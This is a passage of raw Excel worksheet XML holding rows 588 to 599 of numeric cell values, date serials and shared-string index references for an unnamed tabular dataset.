      <c r="AT588" t="s">
        <v>58</v>
      </c>
      <c r="AU588">
        <v>25</v>
      </c>
      <c r="AV588">
        <v>1</v>
      </c>
      <c r="AW588">
        <v>0</v>
      </c>
      <c r="AX588">
        <v>0</v>
      </c>
      <c r="AY588">
        <v>44</v>
      </c>
      <c r="AZ588">
        <v>76</v>
      </c>
      <c r="BA588" t="s">
        <v>16770</v>
      </c>
      <c r="BB588" t="s">
        <v>14914</v>
      </c>
      <c r="BC588">
        <v>0</v>
      </c>
      <c r="BD588" t="s">
        <v>14014</v>
      </c>
    </row>
    <row r="589" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A589">
        <v>1644</v>
      </c>
      <c r="B589" t="s">
        <v>4684</v>
      </c>
      <c r="C589" t="s">
        <v>2060</v>
      </c>
      <c r="D589" t="s">
        <v>4685</v>
      </c>
      <c r="E589" t="s">
        <v>843</v>
      </c>
      <c r="F589" t="s">
        <v>4686</v>
      </c>
      <c r="G589" s="1">
        <v>44347</v>
      </c>
      <c r="H589">
        <v>11607</v>
      </c>
      <c r="I589">
        <v>11607</v>
      </c>
      <c r="J589">
        <v>0</v>
      </c>
      <c r="K589">
        <v>1</v>
      </c>
      <c r="L589">
        <v>0</v>
      </c>
      <c r="M589">
        <v>0</v>
      </c>
      <c r="N589">
        <v>0</v>
      </c>
      <c r="O589">
        <v>0</v>
      </c>
      <c r="P589">
        <v>0</v>
      </c>
      <c r="Q589">
        <v>0</v>
      </c>
      <c r="R589">
        <v>2</v>
      </c>
      <c r="S589">
        <v>0</v>
      </c>
      <c r="T589">
        <v>1</v>
      </c>
      <c r="U589">
        <v>0</v>
      </c>
      <c r="V589">
        <v>5000</v>
      </c>
      <c r="W589">
        <v>0</v>
      </c>
      <c r="X589">
        <v>0</v>
      </c>
      <c r="Y589">
        <v>0</v>
      </c>
      <c r="Z589">
        <v>0</v>
      </c>
      <c r="AA589">
        <v>0</v>
      </c>
      <c r="AB589">
        <v>0</v>
      </c>
      <c r="AC589">
        <v>2000</v>
      </c>
      <c r="AD589">
        <v>0</v>
      </c>
      <c r="AE589">
        <v>2000</v>
      </c>
      <c r="AF589" t="s">
        <v>4687</v>
      </c>
      <c r="AG589">
        <v>96182</v>
      </c>
      <c r="AH589">
        <v>25</v>
      </c>
      <c r="AJ589">
        <v>441</v>
      </c>
      <c r="AK589" t="s">
        <v>2063</v>
      </c>
      <c r="AL589" t="s">
        <v>2064</v>
      </c>
      <c r="AM589" t="s">
        <v>4688</v>
      </c>
      <c r="AN589" t="s">
        <v>68</v>
      </c>
      <c r="AO589">
        <v>2019</v>
      </c>
      <c r="AP589">
        <v>82394893456</v>
      </c>
      <c r="AQ589" t="s">
        <v>4689</v>
      </c>
      <c r="AR589" t="s">
        <v>4690</v>
      </c>
      <c r="AS589" t="s">
        <v>371</v>
      </c>
      <c r="AT589" t="s">
        <v>72</v>
      </c>
      <c r="AU589">
        <v>28</v>
      </c>
      <c r="AV589">
        <v>0</v>
      </c>
      <c r="AW589">
        <v>4</v>
      </c>
      <c r="AX589">
        <v>0</v>
      </c>
      <c r="AY589">
        <v>3</v>
      </c>
      <c r="AZ589">
        <v>0</v>
      </c>
      <c r="BA589" t="s">
        <v>16950</v>
      </c>
      <c r="BB589" t="s">
        <v>15405</v>
      </c>
      <c r="BC589">
        <v>0</v>
      </c>
      <c r="BD589" t="s">
        <v>13771</v>
      </c>
    </row>
    <row r="590" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A590">
        <v>1522</v>
      </c>
      <c r="B590" t="s">
        <v>4691</v>
      </c>
      <c r="C590" t="s">
        <v>99</v>
      </c>
      <c r="D590" t="s">
        <v>4692</v>
      </c>
      <c r="E590" t="s">
        <v>300</v>
      </c>
      <c r="F590" t="s">
        <v>4693</v>
      </c>
      <c r="G590" s="1">
        <v>44378</v>
      </c>
      <c r="H590">
        <v>12237</v>
      </c>
      <c r="I590">
        <v>12237</v>
      </c>
      <c r="J590">
        <v>1</v>
      </c>
      <c r="K590">
        <v>1</v>
      </c>
      <c r="L590">
        <v>1</v>
      </c>
      <c r="M590">
        <v>0</v>
      </c>
      <c r="N590">
        <v>0</v>
      </c>
      <c r="O590">
        <v>0</v>
      </c>
      <c r="P590">
        <v>0</v>
      </c>
      <c r="Q590">
        <v>15</v>
      </c>
      <c r="R590">
        <v>15</v>
      </c>
      <c r="S590">
        <v>0</v>
      </c>
      <c r="T590">
        <v>0</v>
      </c>
      <c r="U590">
        <v>180000</v>
      </c>
      <c r="V590">
        <v>3000</v>
      </c>
      <c r="W590">
        <v>5000</v>
      </c>
      <c r="X590">
        <v>0</v>
      </c>
      <c r="Y590">
        <v>0</v>
      </c>
      <c r="Z590">
        <v>0</v>
      </c>
      <c r="AA590">
        <v>0</v>
      </c>
      <c r="AB590">
        <v>15000</v>
      </c>
      <c r="AC590">
        <v>15000</v>
      </c>
      <c r="AD590">
        <v>0</v>
      </c>
      <c r="AE590">
        <v>0</v>
      </c>
      <c r="AF590" t="s">
        <v>4694</v>
      </c>
      <c r="AG590">
        <v>14450</v>
      </c>
      <c r="AH590">
        <v>12</v>
      </c>
      <c r="AJ590">
        <v>160</v>
      </c>
      <c r="AK590" t="s">
        <v>114</v>
      </c>
      <c r="AL590" t="s">
        <v>115</v>
      </c>
      <c r="AM590" t="s">
        <v>4695</v>
      </c>
      <c r="AN590" t="s">
        <v>55</v>
      </c>
      <c r="AO590">
        <v>2019</v>
      </c>
      <c r="AP590" t="s">
        <v>4696</v>
      </c>
      <c r="AQ590">
        <v>81310165935</v>
      </c>
      <c r="AR590" t="s">
        <v>4694</v>
      </c>
      <c r="AS590" t="s">
        <v>71</v>
      </c>
      <c r="AT590" t="s">
        <v>58</v>
      </c>
      <c r="AU590">
        <v>26</v>
      </c>
      <c r="AV590">
        <v>1</v>
      </c>
      <c r="AW590">
        <v>10</v>
      </c>
      <c r="AX590">
        <v>0</v>
      </c>
      <c r="AY590">
        <v>9</v>
      </c>
      <c r="AZ590">
        <v>1</v>
      </c>
      <c r="BA590" t="s">
        <v>16925</v>
      </c>
      <c r="BB590" t="s">
        <v>15336</v>
      </c>
      <c r="BC590">
        <v>0</v>
      </c>
      <c r="BD590" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="591" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A591">
        <v>2341</v>
      </c>
      <c r="B591" t="s">
        <v>4697</v>
      </c>
      <c r="C591" t="s">
        <v>318</v>
      </c>
      <c r="D591" t="s">
        <v>4698</v>
      </c>
      <c r="E591" t="s">
        <v>49</v>
      </c>
      <c r="F591" t="s">
        <v>364</v>
      </c>
      <c r="G591" s="1">
        <v>43852</v>
      </c>
      <c r="H591">
        <v>2</v>
      </c>
      <c r="I591">
        <v>2</v>
      </c>
      <c r="J591">
        <v>0</v>
      </c>
      <c r="K591">
        <v>0</v>
      </c>
      <c r="L591">
        <v>0</v>
      </c>
      <c r="M591">
        <v>0</v>
      </c>
      <c r="N591">
        <v>0</v>
      </c>
      <c r="O591">
        <v>0</v>
      </c>
      <c r="P591">
        <v>0</v>
      </c>
      <c r="Q591">
        <v>0</v>
      </c>
      <c r="R591">
        <v>0</v>
      </c>
      <c r="S591">
        <v>1</v>
      </c>
      <c r="T591">
        <v>1</v>
      </c>
      <c r="U591">
        <v>0</v>
      </c>
      <c r="V591">
        <v>0</v>
      </c>
      <c r="W591">
        <v>0</v>
      </c>
      <c r="X591">
        <v>0</v>
      </c>
      <c r="Y591">
        <v>0</v>
      </c>
      <c r="Z591">
        <v>0</v>
      </c>
      <c r="AA591">
        <v>0</v>
      </c>
      <c r="AB591">
        <v>0</v>
      </c>
      <c r="AC591">
        <v>0</v>
      </c>
      <c r="AD591">
        <v>1</v>
      </c>
      <c r="AE591">
        <v>500000</v>
      </c>
      <c r="AF591" t="s">
        <v>4699</v>
      </c>
      <c r="AG591">
        <v>90241</v>
      </c>
      <c r="AH591">
        <v>26</v>
      </c>
      <c r="AJ591">
        <v>420</v>
      </c>
      <c r="AK591" t="s">
        <v>936</v>
      </c>
      <c r="AL591" t="s">
        <v>2680</v>
      </c>
      <c r="AM591" t="s">
        <v>4700</v>
      </c>
      <c r="AN591" t="s">
        <v>55</v>
      </c>
      <c r="AO591">
        <v>2019</v>
      </c>
      <c r="AP591">
        <v>6282259566155</v>
      </c>
      <c r="AQ591" t="s">
        <v>4701</v>
      </c>
      <c r="AR591" t="s">
        <v>4702</v>
      </c>
      <c r="AS591" t="s">
        <v>371</v>
      </c>
      <c r="AT591" t="s">
        <v>58</v>
      </c>
      <c r="AU591">
        <v>26</v>
      </c>
      <c r="AV591">
        <v>0</v>
      </c>
      <c r="AW591">
        <v>4</v>
      </c>
      <c r="AX591">
        <v>10</v>
      </c>
      <c r="AY591">
        <v>3</v>
      </c>
      <c r="AZ591">
        <v>0</v>
      </c>
      <c r="BA591" t="s">
        <v>17139</v>
      </c>
      <c r="BB591" t="s">
        <v>15842</v>
      </c>
      <c r="BC591">
        <v>0</v>
      </c>
      <c r="BD591" t="s">
        <v>9931</v>
      </c>
    </row>
    <row r="592" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A592">
        <v>2277</v>
      </c>
      <c r="B592" t="s">
        <v>4703</v>
      </c>
      <c r="C592" t="s">
        <v>318</v>
      </c>
      <c r="D592" t="s">
        <v>4704</v>
      </c>
      <c r="E592" t="s">
        <v>142</v>
      </c>
      <c r="F592" t="s">
        <v>4705</v>
      </c>
      <c r="G592" s="1">
        <v>43845</v>
      </c>
      <c r="H592">
        <v>18</v>
      </c>
      <c r="I592">
        <v>18</v>
      </c>
      <c r="J592">
        <v>0</v>
      </c>
      <c r="K592">
        <v>1</v>
      </c>
      <c r="L592">
        <v>2</v>
      </c>
      <c r="M592">
        <v>0</v>
      </c>
      <c r="N592">
        <v>0</v>
      </c>
      <c r="O592">
        <v>0</v>
      </c>
      <c r="P592">
        <v>0</v>
      </c>
      <c r="Q592">
        <v>0</v>
      </c>
      <c r="R592">
        <v>0</v>
      </c>
      <c r="S592">
        <v>0</v>
      </c>
      <c r="T592">
        <v>0</v>
      </c>
      <c r="U592">
        <v>0</v>
      </c>
      <c r="V592">
        <v>8000</v>
      </c>
      <c r="W592">
        <v>4000</v>
      </c>
      <c r="X592">
        <v>0</v>
      </c>
      <c r="Y592">
        <v>0</v>
      </c>
      <c r="Z592">
        <v>0</v>
      </c>
      <c r="AA592">
        <v>0</v>
      </c>
      <c r="AB592">
        <v>0</v>
      </c>
      <c r="AC592">
        <v>0</v>
      </c>
      <c r="AD592">
        <v>0</v>
      </c>
      <c r="AE592">
        <v>0</v>
      </c>
      <c r="AF592" t="s">
        <v>4706</v>
      </c>
      <c r="AG592">
        <v>92716</v>
      </c>
      <c r="AH592">
        <v>26</v>
      </c>
      <c r="AJ592">
        <v>409</v>
      </c>
      <c r="AK592" t="s">
        <v>4707</v>
      </c>
      <c r="AL592" t="s">
        <v>4708</v>
      </c>
      <c r="AM592" t="s">
        <v>4709</v>
      </c>
      <c r="AN592" t="s">
        <v>68</v>
      </c>
      <c r="AO592">
        <v>2019</v>
      </c>
      <c r="AP592">
        <v>81355667808</v>
      </c>
      <c r="AQ592" t="s">
        <v>4710</v>
      </c>
      <c r="AR592" t="s">
        <v>4711</v>
      </c>
      <c r="AS592" t="s">
        <v>71</v>
      </c>
      <c r="AT592" t="s">
        <v>86</v>
      </c>
      <c r="AU592">
        <v>25</v>
      </c>
      <c r="AV592">
        <v>0</v>
      </c>
      <c r="AW592">
        <v>5</v>
      </c>
      <c r="AX592">
        <v>4</v>
      </c>
      <c r="AY592">
        <v>8</v>
      </c>
      <c r="AZ592">
        <v>4</v>
      </c>
      <c r="BA592" t="s">
        <v>17112</v>
      </c>
      <c r="BB592" t="s">
        <v>15801</v>
      </c>
      <c r="BC592" t="s">
        <v>9985</v>
      </c>
      <c r="BD592" t="s">
        <v>9986</v>
      </c>
    </row>
    <row r="593" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A593">
        <v>2355</v>
      </c>
      <c r="B593" t="s">
        <v>4712</v>
      </c>
      <c r="C593" t="s">
        <v>318</v>
      </c>
      <c r="D593" t="s">
        <v>4713</v>
      </c>
      <c r="E593" t="s">
        <v>49</v>
      </c>
      <c r="F593" t="s">
        <v>364</v>
      </c>
      <c r="G593" s="1">
        <v>43839</v>
      </c>
      <c r="H593">
        <v>59</v>
      </c>
      <c r="I593">
        <v>59</v>
      </c>
      <c r="J593">
        <v>0</v>
      </c>
      <c r="K593">
        <v>0</v>
      </c>
      <c r="L593">
        <v>0</v>
      </c>
      <c r="M593">
        <v>0</v>
      </c>
      <c r="N593">
        <v>0</v>
      </c>
      <c r="O593">
        <v>0</v>
      </c>
      <c r="P593">
        <v>0</v>
      </c>
      <c r="Q593">
        <v>0</v>
      </c>
      <c r="R593">
        <v>0</v>
      </c>
      <c r="S593">
        <v>0</v>
      </c>
      <c r="T593">
        <v>1</v>
      </c>
      <c r="U593">
        <v>0</v>
      </c>
      <c r="V593">
        <v>0</v>
      </c>
      <c r="W593">
        <v>0</v>
      </c>
      <c r="X593">
        <v>0</v>
      </c>
      <c r="Y593">
        <v>0</v>
      </c>
      <c r="Z593">
        <v>0</v>
      </c>
      <c r="AA593">
        <v>0</v>
      </c>
      <c r="AB593">
        <v>0</v>
      </c>
      <c r="AC593">
        <v>0</v>
      </c>
      <c r="AD593">
        <v>0</v>
      </c>
      <c r="AE593">
        <v>400</v>
      </c>
      <c r="AF593" t="s">
        <v>4714</v>
      </c>
      <c r="AG593">
        <v>90245</v>
      </c>
      <c r="AH593">
        <v>26</v>
      </c>
      <c r="AJ593">
        <v>420</v>
      </c>
      <c r="AK593" t="s">
        <v>936</v>
      </c>
      <c r="AL593" t="s">
        <v>2680</v>
      </c>
      <c r="AM593" t="s">
        <v>4715</v>
      </c>
      <c r="AN593" t="s">
        <v>55</v>
      </c>
      <c r="AO593">
        <v>0</v>
      </c>
      <c r="AP593">
        <v>4114743176</v>
      </c>
      <c r="AQ593" t="s">
        <v>4716</v>
      </c>
      <c r="AR593" t="s">
        <v>4714</v>
      </c>
      <c r="AS593" t="s">
        <v>371</v>
      </c>
      <c r="AT593" t="s">
        <v>58</v>
      </c>
      <c r="AU593">
        <v>25</v>
      </c>
      <c r="AV593">
        <v>1</v>
      </c>
      <c r="AW593">
        <v>0</v>
      </c>
      <c r="AX593">
        <v>0</v>
      </c>
      <c r="AY593">
        <v>8</v>
      </c>
      <c r="AZ593">
        <v>2</v>
      </c>
      <c r="BA593" t="s">
        <v>17146</v>
      </c>
      <c r="BB593" t="s">
        <v>15847</v>
      </c>
      <c r="BC593" t="s">
        <v>9506</v>
      </c>
      <c r="BD593" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="594" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A594">
        <v>2143</v>
      </c>
      <c r="B594" t="s">
        <v>4717</v>
      </c>
      <c r="C594" t="s">
        <v>47</v>
      </c>
      <c r="D594" t="s">
        <v>4718</v>
      </c>
      <c r="E594" t="s">
        <v>142</v>
      </c>
      <c r="F594" t="s">
        <v>4719</v>
      </c>
      <c r="G594" s="1">
        <v>43959</v>
      </c>
      <c r="H594">
        <v>80</v>
      </c>
      <c r="I594">
        <v>80</v>
      </c>
      <c r="J594">
        <v>1</v>
      </c>
      <c r="K594">
        <v>0</v>
      </c>
      <c r="L594">
        <v>1</v>
      </c>
      <c r="M594">
        <v>0</v>
      </c>
      <c r="N594">
        <v>0</v>
      </c>
      <c r="O594">
        <v>0</v>
      </c>
      <c r="P594">
        <v>0</v>
      </c>
      <c r="Q594">
        <v>0</v>
      </c>
      <c r="R594">
        <v>0</v>
      </c>
      <c r="S594">
        <v>0</v>
      </c>
      <c r="T594">
        <v>0</v>
      </c>
      <c r="U594">
        <v>1</v>
      </c>
      <c r="V594">
        <v>0</v>
      </c>
      <c r="W594">
        <v>5000</v>
      </c>
      <c r="X594">
        <v>0</v>
      </c>
      <c r="Y594">
        <v>0</v>
      </c>
      <c r="Z594">
        <v>0</v>
      </c>
      <c r="AA594">
        <v>0</v>
      </c>
      <c r="AB594">
        <v>0</v>
      </c>
      <c r="AC594">
        <v>0</v>
      </c>
      <c r="AD594">
        <v>0</v>
      </c>
      <c r="AE594">
        <v>0</v>
      </c>
      <c r="AF594" t="s">
        <v>4720</v>
      </c>
      <c r="AG594">
        <v>20371</v>
      </c>
      <c r="AH594">
        <v>2</v>
      </c>
      <c r="AJ594">
        <v>35</v>
      </c>
      <c r="AK594" t="s">
        <v>471</v>
      </c>
      <c r="AL594" t="s">
        <v>4721</v>
      </c>
      <c r="AM594" t="s">
        <v>4722</v>
      </c>
      <c r="AN594" t="s">
        <v>55</v>
      </c>
      <c r="AO594">
        <v>2018</v>
      </c>
      <c r="AP594" t="s">
        <v>4723</v>
      </c>
      <c r="AQ594" t="s">
        <v>4724</v>
      </c>
      <c r="AR594" t="s">
        <v>4720</v>
      </c>
      <c r="AS594" t="s">
        <v>71</v>
      </c>
      <c r="AT594" t="s">
        <v>58</v>
      </c>
      <c r="AU594">
        <v>26</v>
      </c>
      <c r="AV594">
        <v>1</v>
      </c>
      <c r="AW594">
        <v>21</v>
      </c>
      <c r="AX594">
        <v>30</v>
      </c>
      <c r="AY594">
        <v>7</v>
      </c>
      <c r="AZ594">
        <v>3</v>
      </c>
      <c r="BA594" t="s">
        <v>17029</v>
      </c>
      <c r="BB594" t="s">
        <v>15728</v>
      </c>
      <c r="BC594" t="s">
        <v>9536</v>
      </c>
      <c r="BD594" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="595" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A595">
        <v>2157</v>
      </c>
      <c r="B595" t="s">
        <v>4725</v>
      </c>
      <c r="C595" t="s">
        <v>99</v>
      </c>
      <c r="D595" t="s">
        <v>4726</v>
      </c>
      <c r="E595" t="s">
        <v>142</v>
      </c>
      <c r="F595" t="s">
        <v>4727</v>
      </c>
      <c r="G595" s="1">
        <v>43861</v>
      </c>
      <c r="H595">
        <v>101</v>
      </c>
      <c r="I595">
        <v>101</v>
      </c>
      <c r="J595">
        <v>1</v>
      </c>
      <c r="K595">
        <v>0</v>
      </c>
      <c r="L595">
        <v>0</v>
      </c>
      <c r="M595">
        <v>2</v>
      </c>
      <c r="N595">
        <v>0</v>
      </c>
      <c r="O595">
        <v>0</v>
      </c>
      <c r="P595">
        <v>0</v>
      </c>
      <c r="Q595">
        <v>2</v>
      </c>
      <c r="R595">
        <v>2</v>
      </c>
      <c r="S595">
        <v>0</v>
      </c>
      <c r="T595">
        <v>1</v>
      </c>
      <c r="U595">
        <v>1500</v>
      </c>
      <c r="V595">
        <v>0</v>
      </c>
      <c r="W595">
        <v>0</v>
      </c>
      <c r="X595">
        <v>100</v>
      </c>
      <c r="Y595">
        <v>0</v>
      </c>
      <c r="Z595">
        <v>0</v>
      </c>
      <c r="AA595">
        <v>0</v>
      </c>
      <c r="AB595">
        <v>100</v>
      </c>
      <c r="AC595">
        <v>40</v>
      </c>
      <c r="AD595">
        <v>0</v>
      </c>
      <c r="AE595">
        <v>40</v>
      </c>
      <c r="AF595" t="s">
        <v>4728</v>
      </c>
      <c r="AG595">
        <v>11710</v>
      </c>
      <c r="AH595">
        <v>12</v>
      </c>
      <c r="AJ595">
        <v>159</v>
      </c>
      <c r="AK595" t="s">
        <v>405</v>
      </c>
      <c r="AL595" t="s">
        <v>2338</v>
      </c>
      <c r="AM595" t="s">
        <v>4729</v>
      </c>
      <c r="AN595" t="s">
        <v>68</v>
      </c>
      <c r="AO595">
        <v>2017</v>
      </c>
      <c r="AP595">
        <v>215604989</v>
      </c>
      <c r="AQ595" t="s">
        <v>4730</v>
      </c>
      <c r="AR595" t="s">
        <v>4728</v>
      </c>
      <c r="AS595" t="s">
        <v>71</v>
      </c>
      <c r="AT595" t="s">
        <v>58</v>
      </c>
      <c r="AU595">
        <v>6</v>
      </c>
      <c r="AV595">
        <v>1</v>
      </c>
      <c r="AW595">
        <v>0</v>
      </c>
      <c r="AX595">
        <v>0</v>
      </c>
      <c r="AY595">
        <v>3</v>
      </c>
      <c r="AZ595">
        <v>1</v>
      </c>
      <c r="BA595" t="s">
        <v>17079</v>
      </c>
      <c r="BB595" t="s">
        <v>15734</v>
      </c>
      <c r="BC595" t="s">
        <v>9522</v>
      </c>
      <c r="BD595">
        <v>0</v>
      </c>
    </row>
    <row r="596" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A596">
        <v>2287</v>
      </c>
      <c r="B596" t="s">
        <v>4731</v>
      </c>
      <c r="C596" t="s">
        <v>224</v>
      </c>
      <c r="D596" t="s">
        <v>4732</v>
      </c>
      <c r="E596" t="s">
        <v>4733</v>
      </c>
      <c r="F596" t="s">
        <v>4734</v>
      </c>
      <c r="G596" s="1">
        <v>44061</v>
      </c>
      <c r="H596">
        <v>139</v>
      </c>
      <c r="I596">
        <v>139</v>
      </c>
      <c r="J596">
        <v>0</v>
      </c>
      <c r="K596">
        <v>0</v>
      </c>
      <c r="L596">
        <v>0</v>
      </c>
      <c r="M596">
        <v>0</v>
      </c>
      <c r="N596">
        <v>0</v>
      </c>
      <c r="O596">
        <v>0</v>
      </c>
      <c r="P596">
        <v>0</v>
      </c>
      <c r="Q596">
        <v>1</v>
      </c>
      <c r="R596">
        <v>1</v>
      </c>
      <c r="S596">
        <v>0</v>
      </c>
      <c r="T596">
        <v>0</v>
      </c>
      <c r="U596">
        <v>0</v>
      </c>
      <c r="V596">
        <v>0</v>
      </c>
      <c r="W596">
        <v>0</v>
      </c>
      <c r="X596">
        <v>0</v>
      </c>
      <c r="Y596">
        <v>0</v>
      </c>
      <c r="Z596">
        <v>0</v>
      </c>
      <c r="AA596">
        <v>0</v>
      </c>
      <c r="AB596">
        <v>50</v>
      </c>
      <c r="AC596">
        <v>100</v>
      </c>
      <c r="AD596">
        <v>0</v>
      </c>
      <c r="AE596">
        <v>0</v>
      </c>
      <c r="AF596" t="s">
        <v>4735</v>
      </c>
      <c r="AG596">
        <v>55764</v>
      </c>
      <c r="AH596">
        <v>15</v>
      </c>
      <c r="AJ596">
        <v>224</v>
      </c>
      <c r="AK596" t="s">
        <v>4736</v>
      </c>
      <c r="AL596" t="s">
        <v>4737</v>
      </c>
      <c r="AM596" t="s">
        <v>4738</v>
      </c>
      <c r="AN596" t="s">
        <v>68</v>
      </c>
      <c r="AO596">
        <v>2012</v>
      </c>
      <c r="AP596">
        <v>81327524406</v>
      </c>
      <c r="AQ596" t="s">
        <v>4739</v>
      </c>
      <c r="AR596" t="s">
        <v>4740</v>
      </c>
      <c r="AS596" t="s">
        <v>71</v>
      </c>
      <c r="AT596" t="s">
        <v>72</v>
      </c>
      <c r="AU596">
        <v>7</v>
      </c>
      <c r="AV596">
        <v>1</v>
      </c>
      <c r="AW596">
        <v>0</v>
      </c>
      <c r="AX596">
        <v>3</v>
      </c>
      <c r="AY596">
        <v>0</v>
      </c>
      <c r="AZ596">
        <v>0</v>
      </c>
      <c r="BA596" t="s">
        <v>17117</v>
      </c>
      <c r="BB596" t="s">
        <v>15807</v>
      </c>
      <c r="BC596">
        <v>0</v>
      </c>
      <c r="BD596">
        <v>0</v>
      </c>
    </row>
    <row r="597" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A597">
        <v>2109</v>
      </c>
      <c r="B597" t="s">
        <v>4741</v>
      </c>
      <c r="C597" t="s">
        <v>168</v>
      </c>
      <c r="D597" t="s">
        <v>2489</v>
      </c>
      <c r="E597" t="s">
        <v>300</v>
      </c>
      <c r="F597" t="s">
        <v>4742</v>
      </c>
      <c r="G597" s="1">
        <v>44153</v>
      </c>
      <c r="H597">
        <v>158</v>
      </c>
      <c r="I597">
        <v>158</v>
      </c>
      <c r="J597">
        <v>1</v>
      </c>
      <c r="K597">
        <v>0</v>
      </c>
      <c r="L597">
        <v>0</v>
      </c>
      <c r="M597">
        <v>0</v>
      </c>
      <c r="N597">
        <v>0</v>
      </c>
      <c r="O597">
        <v>0</v>
      </c>
      <c r="P597">
        <v>0</v>
      </c>
      <c r="Q597">
        <v>0</v>
      </c>
      <c r="R597">
        <v>0</v>
      </c>
      <c r="S597">
        <v>0</v>
      </c>
      <c r="T597">
        <v>0</v>
      </c>
      <c r="U597">
        <v>600000</v>
      </c>
      <c r="V597">
        <v>0</v>
      </c>
      <c r="W597">
        <v>0</v>
      </c>
      <c r="X597">
        <v>0</v>
      </c>
      <c r="Y597">
        <v>0</v>
      </c>
      <c r="Z597">
        <v>0</v>
      </c>
      <c r="AA597">
        <v>0</v>
      </c>
      <c r="AB597">
        <v>0</v>
      </c>
      <c r="AC597">
        <v>0</v>
      </c>
      <c r="AD597">
        <v>0</v>
      </c>
      <c r="AE597">
        <v>0</v>
      </c>
      <c r="AF597" t="s">
        <v>4743</v>
      </c>
      <c r="AG597">
        <v>12600</v>
      </c>
      <c r="AH597">
        <v>13</v>
      </c>
      <c r="AJ597">
        <v>184</v>
      </c>
      <c r="AK597" t="s">
        <v>637</v>
      </c>
      <c r="AL597" t="s">
        <v>2492</v>
      </c>
      <c r="AM597" t="s">
        <v>4744</v>
      </c>
      <c r="AN597" t="s">
        <v>55</v>
      </c>
      <c r="AO597">
        <v>2018</v>
      </c>
      <c r="AP597">
        <v>8568675335</v>
      </c>
      <c r="AQ597" t="s">
        <v>4745</v>
      </c>
      <c r="AR597" t="s">
        <v>4746</v>
      </c>
      <c r="AS597" t="s">
        <v>179</v>
      </c>
      <c r="AT597" t="s">
        <v>58</v>
      </c>
      <c r="AU597">
        <v>24</v>
      </c>
      <c r="AV597">
        <v>1</v>
      </c>
      <c r="AW597">
        <v>0</v>
      </c>
      <c r="AX597">
        <v>0</v>
      </c>
      <c r="AY597">
        <v>4</v>
      </c>
      <c r="AZ597">
        <v>0</v>
      </c>
      <c r="BA597" t="s">
        <v>17068</v>
      </c>
      <c r="BB597" t="s">
        <v>15706</v>
      </c>
      <c r="BC597" t="s">
        <v>9774</v>
      </c>
      <c r="BD597">
        <v>0</v>
      </c>
    </row>
    <row r="598" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A598">
        <v>2021</v>
      </c>
      <c r="B598" t="s">
        <v>4747</v>
      </c>
      <c r="C598" t="s">
        <v>2308</v>
      </c>
      <c r="D598" t="s">
        <v>4748</v>
      </c>
      <c r="E598" t="s">
        <v>142</v>
      </c>
      <c r="F598" t="s">
        <v>666</v>
      </c>
      <c r="G598" s="1">
        <v>43843</v>
      </c>
      <c r="H598">
        <v>166</v>
      </c>
      <c r="I598">
        <v>166</v>
      </c>
      <c r="J598">
        <v>1</v>
      </c>
      <c r="K598">
        <v>0</v>
      </c>
      <c r="L598">
        <v>3</v>
      </c>
      <c r="M598">
        <v>0</v>
      </c>
      <c r="N598">
        <v>0</v>
      </c>
      <c r="O598">
        <v>0</v>
      </c>
      <c r="P598">
        <v>0</v>
      </c>
      <c r="Q598">
        <v>0</v>
      </c>
      <c r="R598">
        <v>2</v>
      </c>
      <c r="S598">
        <v>0</v>
      </c>
      <c r="T598">
        <v>0</v>
      </c>
      <c r="U598">
        <v>100</v>
      </c>
      <c r="V598">
        <v>0</v>
      </c>
      <c r="W598">
        <v>14</v>
      </c>
      <c r="X598">
        <v>0</v>
      </c>
      <c r="Y598">
        <v>0</v>
      </c>
      <c r="Z598">
        <v>0</v>
      </c>
      <c r="AA598">
        <v>0</v>
      </c>
      <c r="AB598">
        <v>0</v>
      </c>
      <c r="AC598">
        <v>500</v>
      </c>
      <c r="AD598">
        <v>0</v>
      </c>
      <c r="AE598">
        <v>0</v>
      </c>
      <c r="AF598" t="s">
        <v>4749</v>
      </c>
      <c r="AG598">
        <v>98414</v>
      </c>
      <c r="AH598">
        <v>33</v>
      </c>
      <c r="AJ598">
        <v>485</v>
      </c>
      <c r="AK598" t="s">
        <v>4750</v>
      </c>
      <c r="AL598" t="s">
        <v>4751</v>
      </c>
      <c r="AM598" t="s">
        <v>4752</v>
      </c>
      <c r="AN598" t="s">
        <v>288</v>
      </c>
      <c r="AO598">
        <v>2005</v>
      </c>
      <c r="AP598" t="s">
        <v>4753</v>
      </c>
      <c r="AQ598" t="s">
        <v>4754</v>
      </c>
      <c r="AR598" t="s">
        <v>4755</v>
      </c>
      <c r="AS598" t="s">
        <v>71</v>
      </c>
      <c r="AT598" t="s">
        <v>58</v>
      </c>
      <c r="AU598">
        <v>26</v>
      </c>
      <c r="AV598">
        <v>0</v>
      </c>
      <c r="AW598">
        <v>2</v>
      </c>
      <c r="AX598">
        <v>4</v>
      </c>
      <c r="AY598">
        <v>8</v>
      </c>
      <c r="AZ598">
        <v>3</v>
      </c>
      <c r="BA598" t="s">
        <v>17033</v>
      </c>
      <c r="BB598" t="s">
        <v>15614</v>
      </c>
      <c r="BC598">
        <v>0</v>
      </c>
      <c r="BD598">
        <v>0</v>
      </c>
    </row>
    <row r="599" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A599">
        <v>2325</v>
      </c>
      <c r="B599" t="s">
        <v>4756</v>
      </c>
      <c r="C599" t="s">
        <v>199</v>
      </c>
      <c r="D599" t="s">
        <v>4757</v>
      </c>
      <c r="E599" t="s">
        <v>984</v>
      </c>
      <c r="F599" t="s">
        <v>4758</v>
      </c>
      <c r="G599" s="1">
        <v>43853</v>
      </c>
      <c r="H599">
        <v>198</v>
      </c>
      <c r="I599">
        <v>198</v>
      </c>
      <c r="J599">
        <v>1</v>
      </c>
      <c r="K599">
        <v>0</v>
      </c>
      <c r="L599">
        <v>1</v>
      </c>
      <c r="M599">
        <v>0</v>
      </c>
      <c r="N599">
        <v>0</v>
      </c>
      <c r="O599">
        <v>0</v>
      </c>
      <c r="P599">
        <v>0</v>
      </c>
